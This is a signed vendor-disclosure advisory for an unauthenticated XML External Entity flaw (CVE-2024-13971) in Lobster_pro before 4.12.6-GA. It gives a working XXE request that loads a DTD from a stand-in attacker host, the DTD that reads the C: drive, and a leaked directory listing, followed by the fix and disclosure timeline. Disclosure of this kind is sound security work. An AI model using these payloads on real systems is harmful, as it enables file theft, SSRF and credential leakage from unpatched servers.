📄 Lobster_pro Arbitrary File Read / Server-Side Request Forgery

-----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA512
    
    Arbitrary File Read and Server Side Request Forgery via XML External 
    Entities in
    Lobster_pro
    ============================================================================================
    
    Unauthenticated attackers can exploit a weakness in the XML parser 
    functionality of
    Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read 
    access to files on
    the application server and adjacent network shares, and perform HTTP GET 
    requests to
    arbitrary services.
    
    Metadata
    ========
    
    - - Affected product: Lobster_pro
    - - Affected version: versions prior to 4.12.6-GA
    - - Vendor: Lobster DATA GmbH
    - - Problem type(s): CWE-611 Improper Restriction of XML External Entity 
    Reference
    - - CVE ID: CVE-2024-13971
    - - CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-13971
    - - CVSS 4.0 score: 7.7
    - - Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-005/
    
    Details
    =======
    
    During a recent red team engagement, the no-code platform Lobster_pro 
    was identified as
    part of the customer's internet-facing assets.
    
    The endpoint https://<lobster-pro instance>:443/system/web was found to 
    process XML via
    HTTP POST requests. Sending the following payload and observing the 
    attacker-controlled
    web server confirms that XML External Entities (XXE) are followed and 
    loaded by the
    application:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE lbsterq [
             <!ENTITY % lobster SYSTEM "http://attacker.tld/map.dtd">
    %lobster;
    ]>
    <properties>lobster</properties>
    
    Serving the following file map.dtd, it is possible to retrieve file 
    contents, directory
    listings or HTTP responses via the error message returned by the endpoint:
    
    <!ENTITY % cfga SYSTEM "file:///c:">
    <!ENTITY % eea "<!ENTITY &#x25; lobsterdata SYSTEM '#%cfga;'>">
    %eea;
    %lobsterdata;
    
    The HTTP response contains an error message, embedding the file content 
    or directory
    listing:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <core:ErrorResponse xmlns:core="CORESYSTEM">
       <errorInfo>
          <errorCode>500</errorCode>
          <httpResponseStatus>200</httpResponseStatus>
          <locale>en</locale>
          <errorText>javax.xml.bind.UnmarshalException
     - with linked exception:
    [Exception [EclipseLink-25004] (Eclipse Persistence Services - 
    2.7.8.qualifier): 
    org.eclipse.persistence.exceptions.XMLMarshalException&#xd;
    Exception Description: An error occurred unmarshalling the document&#xd;
    Internal Exception: javax.xml.stream.XMLStreamException: ParseError at 
    [row,col]:[4,10]
    Message: no protocol: #$Recycle.Bin
    Config.Msi
    [...]
    pagefile.sys
    PerfLogs
    ProgramData
    Program Files
    Program Files (x86)
    Programme
    [...]
    temp
    Users
    Windows
    ]</errorText>
          <errorType>java.io.IOException</errorType>
          <errorLevel>1</errorLevel>
       </errorInfo>
    </core:ErrorResponse>
    
    Due to the way content is included, some symbols (e.g., the percent sign 
    %) lead to
    recursive entity declarations, thus preventing data exfiltration.
    
    Risk
    ====
    
    An attacker can use the vulnerability to gather information and, 
    depending on the stored
    data, exfiltrate secrets from the file system and adjacent SMB shares. 
    Furthermore, HTTP
    requests can be used for out-of-band exfiltration and server side 
    request forgery (SSRF)
    attacks. Utilizing the SMB protocol could also enable leakage of the 
    application user NTLM
    hash.
    
    Solution/Mitigation
    ===================
    
    Update to Lobster_pro release 4.12.6-GA or higher.
    
    Timeline
    ========
    
    - - 2024-08-12 Initial contact with vendor
    - - 2024-08-14 Vulnerability reported to vendor
    - - 2024-08-14 CVE ID requested
    - - 2024-08-22 Initial feedback received from vendor: unable to reproduce
    - - 2024-08-28 Vulnerability demonstrated in vendor's "Community server"
    - - 2024-09-19 Vulnerability reported fixed by vendor in Lobster_pro 
    release 4.12.6-GA
    - - 2025-07-03 Reserved CVE ID CVE-2024-13971
    - - 2026-04-30 Advisory released
    
    Credits
    =======
    
    The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.
    -----BEGIN PGP SIGNATURE-----
    
    iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmnzRmsaHGFkdmlzb3Jp
    ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsvxRAAkVaWMk/lJwfZi0Y0OWpr
    5TQP/YCieTkxpkdiY0PF8dGApB3cp8ysschRAUgWIbeR7f1cj/4hbc3a1GxnZWV7
    2gk1fdQieSdkJs8uBsKz0CeEasMztCI6KcmxWL+CMFHJoH+Q5Gd7MdOh1Og/zVgh
    /UAAfzxihL0Gmx+gl6hpZVYSmqQctD4ogbmdQCU2mEuoHZRGLCzaiOtS8AZbOhvT
    3IvC3ws3cQIAwzD7YH+5V+97cXqbFVnRoNL4YgJ9/pCHXinYZvL1JGL4Ob26/GvD
    QfYqUOgpDsfr9GTZVSZT3S8pUVomMW9+FOjhpcOkRICkJ8cEdLhW5CIoaxweEcwE
    PQSSC5QS5DIfVKgGo4lc0Oe9k3pT/dnH9iEfnV5hnq7+JgapQzqxNaf6BCZJX+ET
    voIVVjyOYyP2Qzs4LSaArWxlcb0XR/DewW9qlvfnea4SfDkrG/hhRK3qBNrC83IR
    IXmBTbp32Sfoh2X1W/frL4BtvIXkDirgF+sttAjoQKN3wVttuKj1JaM/BQ/pDf/N
    pPAwaYzuuuf2Wv3NiBKIgB5tHuHKAQoKQPev7Z6pvDq0sB5ps9SRknIOEmfh/aoE
    7aNztVHs+/6axCVKcuV7+qWv6HUwg4oDp78Lo9r8Oq/9rdbZ3TKtf/KWn4uT+sWw
    Zk6o928sfQFlkXtTXRiGSwE=
    =560Z
    -----END PGP SIGNATURE-----
    
    -- 
    SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
    Zertifiziert / Certified ISO 27001, 9001 and TISAX
    
    Phone +49 731 977 191 0
    
    [email protected] / www.schutzwerk.com
    
    Geschäftsführer / Managing Directors:
    Jakob Pietzka, Michael Schäfer
    
    Amtsgericht Ulm /  HRB 727391
    Datenschutz / Data Protection www.schutzwerk.com/datenschutz